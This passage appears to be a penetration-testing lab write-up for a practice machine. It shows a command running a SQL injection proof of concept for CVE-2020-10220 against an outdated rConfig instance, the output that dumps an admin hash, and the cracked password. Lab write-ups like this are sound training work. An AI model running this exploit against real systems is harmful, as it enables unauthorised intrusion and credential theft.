SQL Injection
The target rConfig instance runs an outdated version, 3.9.4, which is vulnerable to CVE-2020-10220.
Exploit Script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/quackerJack/exploits-rconfig]
└─$ python3 rconfig_sqli.py https://$IP:8081
rconfig 3.9 - SQL Injection PoC
[+] Triggering the payloads on https://192.168.144.57:8081/commands.inc.php
[+] Extracting the current DB name :
rconfig
[+] Extracting 10 first users :
admin:1:dc40b85276a1f4d7cb35f154236aa1b2
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
[+] Extracting 10 first devices :
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Maybe no more information ?
Done
Executing the exploit script exfiltrates the admin credential: admin:1:dc40b85276a1f4d7cb35f154236aa1b2
Password Cracking
Password hash cracked for the admin user: abgrtyu
The credential may be used for exploitation.